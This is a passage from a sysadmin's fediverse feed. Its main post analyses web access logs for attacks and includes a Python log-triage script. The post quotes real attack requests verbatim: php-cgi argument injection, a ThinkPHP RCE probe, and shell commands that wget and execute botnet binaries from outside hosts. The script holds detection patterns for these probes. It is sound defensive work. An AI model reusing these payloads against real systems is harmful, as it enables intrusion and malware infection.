fediadmin, security, long
Did not clear my access log for some time, amassing over 300 MB.
What I looked at
Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)
Findings
One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking for exploitable services and shells
Most popular was checking for WordPress and phpMyAdmin, and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249
Details
Top attackers
211.21.226[.]123 (Taiwan), 122.14.213[.]79 (China), 113.53.230[.]34 (Thailand), 150.109.78[.]53 (Singapore), 118.25.38[.]1 (China), 118.25.111[.]38 (China), 106.12.40[.]125 (China), 103.45.99[.]20 (China), 47.199.217[.]59 (US)
The longest attack URL, used by many Chinese attackers
"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"
This URL decodes to:
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
I’d rather not Think PHP, thanks
"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"
Ask and thou shalt receive. 16 attackers asked for a shell.
GET /shell.php HTTP/1.1
Kinda cute
"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-"
"GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
"GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"
Top unusual request lines
https[:]//volcable.ru/ (24), https[:]//jyvopys.com/ (21), https[:]//vulkan-platinym24.ru/ (18), https[:]//sexjk.com/ (18), https[:]//glassdeskguide.com/ (18), https[:]//dezgorkontrol.ru/ (18), https[:]//brendof-club.com/ (18), https[:]//arabic-poetry.com/ (18), http[:]//hacron.ru/ (18), https[:]//se.painting-planet.com/ (15), https[:]//landofgames.ru/ (15)
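The checks listed under "What I looked at" (attack patterns, unusual status codes, POSTs outside the fediverse endpoints) turned into a small triage script, run over constructed log lines modelled on the requests quoted in this thread. This is an added example, not the author's own tooling; the signature regexes, the set of "normal" fediverse POST targets, the status-code list and the documentation-range IPs are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus
# Combined log format (nginx/Apache): ip - - [time] "METHOD path HTTP/x" status bytes "referer" "ua"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>.*?)(?: HTTP/[\d.]+)?" (?P<status>\d{3})')
# Signatures for the probe families quoted in the thread, matched against the decoded request path.
PATTERNS = {
    "php-cgi arg injection": re.compile(r"/php-cgi\?.*-d\s+allow_url_include"),
    "thinkphp invokefunction": re.compile(r"invokefunction.*call_user_func_array"),
    "webshell probe": re.compile(r"/shell(\.php)?(\?|$)"),
    "download-and-run chain": re.compile(r"(wget|curl)[^;]*;\s*chmod"),
    "sql injection": re.compile(r"union\s+select|'\s*or\s+1=1", re.I),
    "path traversal": re.compile(r"\.\./\.\./"),
    "cms/admin enumeration": re.compile(r"/(wp-login\.php|wp-admin|phpmyadmin)", re.I),
}
# POST targets that are normal on a fediverse server (ActivityPub inboxes, Web Push); an assumption.
FEDI_POST_OK = re.compile(r"^/(inbox|users/[^/]+/inbox|api/v1/push/subscription)(\?|$)")
UNUSUAL_STATUS = {400, 405, 414, 500, 502}  # 404 left out: probes produce it in bulk (assumption)

def classify(line):
    """Return (ip, findings) for one log line; findings is an empty list for benign traffic."""
    m = LINE_RE.match(line)
    if not m:
        return None, ["unparseable line"]
    # Decode twice so double-encoded payloads are seen in the clear; '+' becomes a space.
    path = unquote_plus(unquote_plus(m["path"]))
    findings = [name for name, rx in PATTERNS.items() if rx.search(path)]
    if m["method"] == "POST" and not FEDI_POST_OK.match(path):
        findings.append("POST to unusual place")
    if int(m["status"]) in UNUSUAL_STATUS:
        findings.append("unusual status " + m["status"])
    return m["ip"], findings

def report(lines):
    """Aggregate findings per source IP: {ip: Counter(finding -> hits)}."""
    per_ip = {}
    for line in lines:
        ip, findings = classify(line)
        if ip and findings:
            per_ip.setdefault(ip, Counter()).update(findings)
    return per_ip

# Constructed sample lines modelled on the requests quoted above (documentation-range IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2020:00:00:01 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6E HTTP/1.1" 404 146 "-" "-"',
    '203.0.113.5 - - [01/Jan/2020:00:00:02 +0000] "GET /index.php?s=/Index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 146 "-" "-"',
    '198.51.100.7 - - [01/Jan/2020:00:00:03 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.0.2.9/x.arm;chmod+777+x.arm;sh+/tmp/x.arm HTTP/1.1" 404 146 "-" "Hello, world"',
    '192.0.2.44 - - [01/Jan/2020:00:00:04 +0000] "POST /users/alice/inbox HTTP/1.1" 202 0 "-" "http.rb/4.3.0 (Mastodon/3.1)"',
    '192.0.2.45 - - [01/Jan/2020:00:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 405 0 "-" "-"',
]
```

`report(SAMPLE_LOG)` groups hits per IP, which is what the "Top attackers" count above needs; feed it `open("access.log")` for a real file.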
@nikolal CentOS.
@quad Have you tried OpenNebula?
@vickysteeves Hey, it's fine to not be good at "writing full things", nobody can be good at everything simultaneously, why not delegate?
@sheogorath My blog has date-style post links. The only downside is that it will break old links, so search engines and old notes need to be updated for that. https://l1cafe.blog/2019/03/03/kuya-1-writeup.html for example.
Interesting alternative to Keybase, after it has been acquired by Zoom.
https://techcrunch.com/2020/05/07/zoom-acquires-keybase-to-get-end-to-end-encryption-expertise/
@dildog Oh my gosh, that's super good! I'm happy for you and very, very sad for them 😂
@amolith you can make your CI catch some of them:
https://git.shivering-isles.com/shivering-isles/blog/-/blob/deploy/.gitlab-ci.yml#L10
Always a good thing to throw an analyzer at your stuff before publishing.
@sheogorath @amolith Copying, thanks.
Oh, by the way, here's a link to the Vigil project. https://github.com/valeriansaliou/vigil
Just finished testing and deploying my Ansible script for https://status.kydara.com/
I'm using Vigil. It updates automatically and notifies me if anything goes wrong. This should make maintaining the whole infrastructure much easier, I hope!
#ComputerScience & #Engineering student, #cybersecurity enthusiast, #privacy advocate.
I blog about CTFs and system administration. Sometimes a bit of reverse engineering as well.
Posts are my own and do not represent the views of my employer.